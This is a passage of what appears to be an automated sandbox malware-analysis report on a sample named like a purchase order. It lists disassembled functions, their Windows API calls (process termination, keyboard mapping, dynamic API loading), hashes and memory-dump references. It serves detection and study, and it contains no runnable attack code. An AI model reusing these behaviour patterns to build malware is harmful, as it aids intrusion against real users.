                                                                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 0041E1D1
                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041E1D8
                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0041E1E0
                                                                                                              • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0041E1F7
                                                                                                              • MulDiv.KERNEL32(000009EC,?,?), ref: 0041E209
                                                                                                                • Part of subcall function 00419AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00419A05,00000000,00000000,?,00419DDB), ref: 0041A53A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CapsDevice$ExceptionRaiseRelease
                                                                                                              • String ID:
                                                                                                              • API String ID: 603618608-0
                                                                                                              • Opcode ID: 5655475598f44c1d5217a29c8e09e4a4f43cdbdd6486f7f7e7dd9e451af03859
                                                                                                              • Instruction ID: 26290a3b2d5e982af23d24ca08dbaf8b64f289bae65c8ba36aeea9785281fc90
                                                                                                              • Opcode Fuzzy Hash: 5655475598f44c1d5217a29c8e09e4a4f43cdbdd6486f7f7e7dd9e451af03859
                                                                                                              • Instruction Fuzzy Hash: B10184B5F00214BFEB109BA6CC45B5EBFB8EB48351F044066EE09A7390E6B09C00CB65
                                                                                                              Function 00407B47 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __init_pointers.LIBCMT ref: 00407B47
                                                                                                                • Part of subcall function 0040123A: __initp_misc_winsig.LIBCMT ref: 0040125E
                                                                                                                • Part of subcall function 0040123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00407F51
                                                                                                                • Part of subcall function 0040123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00407F65
                                                                                                                • Part of subcall function 0040123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00407F78
                                                                                                                • Part of subcall function 0040123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00407F8B
                                                                                                                • Part of subcall function 0040123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00407F9E
                                                                                                                • Part of subcall function 0040123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00407FB1
                                                                                                                • Part of subcall function 0040123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00407FC4
                                                                                                                • Part of subcall function 0040123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00407FD7
                                                                                                                • Part of subcall function 0040123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00407FEA
                                                                                                                • Part of subcall function 0040123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00407FFD
                                                                                                                • Part of subcall function 0040123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00408010
                                                                                                                • Part of subcall function 0040123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00408023
                                                                                                                • Part of subcall function 0040123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00408036
                                                                                                                • Part of subcall function 0040123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00408049
                                                                                                                • Part of subcall function 0040123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0040805C
                                                                                                                • Part of subcall function 0040123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0040806F
                                                                                                              • __mtinitlocks.LIBCMT ref: 00407B4C
                                                                                                                • Part of subcall function 00407E23: InitializeCriticalSectionAndSpinCount.KERNEL32(0049AC68,00000FA0,?,?,00407B51,00405E77,00496C70,00000014), ref: 00407E41
                                                                                                              • __mtterm.LIBCMT ref: 00407B55
                                                                                                                • Part of subcall function 00407BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00407B5A,00405E77,00496C70,00000014), ref: 00407D3F
                                                                                                                • Part of subcall function 00407BBD: _free.LIBCMT ref: 00407D46
                                                                                                                • Part of subcall function 00407BBD: DeleteCriticalSection.KERNEL32(0049AC68,?,?,00407B5A,00405E77,00496C70,00000014), ref: 00407D68
                                                                                                              • __calloc_crt.LIBCMT ref: 00407B7A
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00407BA3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 2942034483-0
                                                                                                              • Opcode ID: 9da07c6fb743f7523c1765c837c203529e176d54a7244bd25beef11088a777d5
                                                                                                              • Instruction ID: 0c25899785580a9bd6e7af60ad399ce991e4db952022c35941b707c4a88133ef
                                                                                                              • Opcode Fuzzy Hash: 9da07c6fb743f7523c1765c837c203529e176d54a7244bd25beef11088a777d5
                                                                                                              • Instruction Fuzzy Hash: 0EF0C232E1D21119E6247636BC0664B36A09F0133CB2006BFF860F51D2FB7CB81244AF
                                                                                                              Function 003E27EC Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 003E281D
                                                                                                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 003E2825
                                                                                                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 003E2830
                                                                                                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 003E283B
                                                                                                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 003E2843
                                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 003E284B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Virtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 4278518827-0
                                                                                                              • Opcode ID: 600778f131887751708443533fd4ff12a708e1db5a3fab8814bbe61520e591d2
                                                                                                              • Instruction ID: 17a028283580c1c31cac4438e6c47462fbd0ce29abfd8384df811e8179969f4c
                                                                                                              • Opcode Fuzzy Hash: 600778f131887751708443533fd4ff12a708e1db5a3fab8814bbe61520e591d2
                                                                                                              • Instruction Fuzzy Hash: 560167B0A02B5ABDE3008F6A8C85B52FFA8FF19354F00411BE15C47A42C7F5A864CBE5
                                                                                                              Function 00429AD5 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                                                              • String ID:
                                                                                                              • API String ID: 1423608774-0
                                                                                                              • Opcode ID: 62b6ceaab4bdeb601106f6acf59a9d37234847f890a9ff43b37f7c88b543b3a8
                                                                                                              • Instruction ID: 7923d0cf584a47794db22c5d9060793284823caaaeb3e18e8073edf10af3b71e
                                                                                                              • Opcode Fuzzy Hash: 62b6ceaab4bdeb601106f6acf59a9d37234847f890a9ff43b37f7c88b543b3a8
                                                                                                              • Instruction Fuzzy Hash: 29018632F01321ABD7155B55FC59DEB7769FF88701F44047AF50392194EBA89C00DB59
                                                                                                              Function 00427BF7 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00427C07
                                                                                                              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00427C1D
                                                                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 00427C2C
                                                                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00427C3B
                                                                                                              • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00427C45
                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00427C4C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 839392675-0
                                                                                                              • Opcode ID: 65a6a1a96fb289657e5fc9f6bc5bb41e560d8ad946cbcc2ecc9bd6aa948d7d0c
                                                                                                              • Instruction ID: e38e3cc981ac08fc9b8de8a018ca08b000563801ea3e10a13d50fbb2f62cbdb1
                                                                                                              • Opcode Fuzzy Hash: 65a6a1a96fb289657e5fc9f6bc5bb41e560d8ad946cbcc2ecc9bd6aa948d7d0c
                                                                                                              • Instruction Fuzzy Hash: B3F03072B41158BBE7215752DC0DEEF7B7CDFC6B11F000029FA0191161E7E05A41C6BA
                                                                                                              Function 00429A20 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • InterlockedExchange.KERNEL32(?,?), ref: 00429A33
                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,00455DEE,?,?,?,?,?,003EED63), ref: 00429A44
                                                                                                              • TerminateThread.KERNEL32(?,000001F6,?,?,?,00455DEE,?,?,?,?,?,003EED63), ref: 00429A51
                                                                                                              • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00455DEE,?,?,?,?,?,003EED63), ref: 00429A5E
                                                                                                                • Part of subcall function 004293D1: CloseHandle.KERNEL32(?,?,00429A6B,?,?,?,00455DEE,?,?,?,?,?,003EED63), ref: 004293DB
                                                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00429A71
                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,?,00455DEE,?,?,?,?,?,003EED63), ref: 00429A78
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                              • String ID:
                                                                                                              • API String ID: 3495660284-0
                                                                                                              • Opcode ID: 60d36eac61474d8114e91167298f7f674fdc06369c66d9bbc982e60b5eb0ef7e
                                                                                                              • Instruction ID: 15a09142c08335e1de9612733818fb20c29c770644c172ac6ec9836777d6df5e
                                                                                                              • Opcode Fuzzy Hash: 60d36eac61474d8114e91167298f7f674fdc06369c66d9bbc982e60b5eb0ef7e
                                                                                                              • Instruction Fuzzy Hash: 44F03A32F41211ABD7111BA4EC999EB7729FB88701F5404B6F503951A0EBB99C01DA6A
                                                                                                              Function 003E1CDE Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 003FF4EA: std::exception::exception.LIBCMT ref: 003FF51E
                                                                                                                • Part of subcall function 003FF4EA: __CxxThrowException@8.LIBCMT ref: 003FF533
                                                                                                              • __swprintf.LIBCMT ref: 003E1EA6
                                                                                                              Strings
                                                                                                              • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 003E1D49
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                                                                              • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                              • API String ID: 2125237772-557222456
                                                                                                              • Opcode ID: 1005149ace63bcc68a0d0063846654df3f023ad8d03aefd331b46013519fe2cc
                                                                                                              • Instruction ID: fa58a84e3d4ab785aed2f190b21e9898cd947ab3b017cb51f289aee26fb3b896
                                                                                                              • Opcode Fuzzy Hash: 1005149ace63bcc68a0d0063846654df3f023ad8d03aefd331b46013519fe2cc
                                                                                                              • Instruction Fuzzy Hash: 09917D711043A1AFC716EF25C896C6FB7A4AF95700F004A1EF8859B2E2DB74ED05CB96
                                                                                                              Function 0043AFE0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • VariantInit.OLEAUT32(?), ref: 0043B006
                                                                                                              • CharUpperBuffW.USER32(?,?), ref: 0043B115
                                                                                                              • VariantClear.OLEAUT32(?), ref: 0043B298
                                                                                                                • Part of subcall function 00429DC5: VariantInit.OLEAUT32(00000000), ref: 00429E05
                                                                                                                • Part of subcall function 00429DC5: VariantCopy.OLEAUT32(?,?), ref: 00429E0E
                                                                                                                • Part of subcall function 00429DC5: VariantClear.OLEAUT32(?), ref: 00429E1A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                              • API String ID: 4237274167-1221869570
                                                                                                              • Opcode ID: fa8d1473ed622c159d0b3bb6515e9d014aaac649fea44b5916c914da84715f18
                                                                                                              • Instruction ID: b9e9742710e60544bfca89dae10a9a38c06419d560c9d3aebf414dfef72ef46d
                                                                                                              • Opcode Fuzzy Hash: fa8d1473ed622c159d0b3bb6515e9d014aaac649fea44b5916c914da84715f18
                                                                                                              • Instruction Fuzzy Hash: 46918A306083419FCB10DF25C485A5BBBF4EF89704F04496EF99A9B3A2DB35E905CB96
                                                                                                              Function 00425347 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 003FC6F4: _wcscpy.LIBCMT ref: 003FC717
                                                                                                              • _memset.LIBCMT ref: 00425438
                                                                                                              • GetMenuItemInfoW.USER32(?), ref: 00425467
                                                                                                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00425513
                                                                                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0042553D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                              • String ID: 0
                                                                                                              • API String ID: 4152858687-4108050209
                                                                                                              • Opcode ID: 25252a0acd4452cb51e1c3d9e530a06f728c715cad2853924e03d7869cd1df6d
                                                                                                              • Instruction ID: a98cfccb1a580532ab3ffb0bfec07548cefc6fc31b68b0d08c551743611e71c1
                                                                                                              • Opcode Fuzzy Hash: 25252a0acd4452cb51e1c3d9e530a06f728c715cad2853924e03d7869cd1df6d
                                                                                                              • Instruction Fuzzy Hash: B651FF71704621AAD315EE28E84176BB7E8AF95350F84062FF895D22A0DBB8CD80875A
                                                                                                              Function 00420213 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0042027B
                                                                                                              • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 004202B1
                                                                                                              • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 004202C2
                                                                                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00420344
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                              • String ID: DllGetClassObject
                                                                                                              • API String ID: 753597075-1075368562
                                                                                                              • Opcode ID: 3e72964e90e0b3a5673718c6d7d26a252987dd3102fded8293fc50545dd50166
                                                                                                              • Instruction ID: 34171231c4b9f855661739614a0c6e6a032955ee753f2ccabb85b0abce5efd00
                                                                                                              • Opcode Fuzzy Hash: 3e72964e90e0b3a5673718c6d7d26a252987dd3102fded8293fc50545dd50166
                                                                                                              • Instruction Fuzzy Hash: 30413C71B00214AFDB05CF54D884B9ABBF9EF48314B5480AAED099F206D7B9D944CBA5
                                                                                                              Function 00425007 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _memset.LIBCMT ref: 00425075
                                                                                                              • GetMenuItemInfoW.USER32 ref: 00425091
                                                                                                              • DeleteMenu.USER32(00000004,00000007,00000000), ref: 004250D7
                                                                                                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,004A1708,00000000), ref: 00425120
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Menu$Delete$InfoItem_memset
                                                                                                              • String ID: 0
                                                                                                              • API String ID: 1173514356-4108050209
                                                                                                              • Opcode ID: 4608d8e5a4cb402d127065270ac3f6cccd4c4a315de5c0fa06f904f45d60da80
                                                                                                              • Instruction ID: df6a1c78d91943526ed4a6ad8eb057972f0a864222dabe46cceffba957dc0ba6
                                                                                                              • Opcode Fuzzy Hash: 4608d8e5a4cb402d127065270ac3f6cccd4c4a315de5c0fa06f904f45d60da80
                                                                                                              • Instruction Fuzzy Hash: E441AE307047119FD720DF29E884B6BB7E4AF85328F04462EF85597391D774E810CB6A
                                                                                                              Function 00440567 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CharLowerBuffW.USER32(?,?,?,?), ref: 00440587
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: BuffCharLower
                                                                                                              • String ID: cdecl$none$stdcall$winapi
                                                                                                              • API String ID: 2358735015-567219261
                                                                                                              • Opcode ID: fd336047704b9863fe0752c4e79e98718a3d19f3cecedc0caeb9c4db80d6b28d
                                                                                                              • Instruction ID: 32a57d009e1a0ab02bbb4ab93d628dfc7052ff273941dcd5ed73a1a10a4008fa
                                                                                                              • Opcode Fuzzy Hash: fd336047704b9863fe0752c4e79e98718a3d19f3cecedc0caeb9c4db80d6b28d
                                                                                                              • Instruction Fuzzy Hash: 2B31A13050021AABCF01EF54C9419EFB7B4FF54314B10862AF926AB2D1DB75A916CB84
                                                                                                              Function 0041B80A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0041B88E
                                                                                                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0041B8A1
                                                                                                              • SendMessageW.USER32(?,00000189,?,00000000), ref: 0041B8D1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
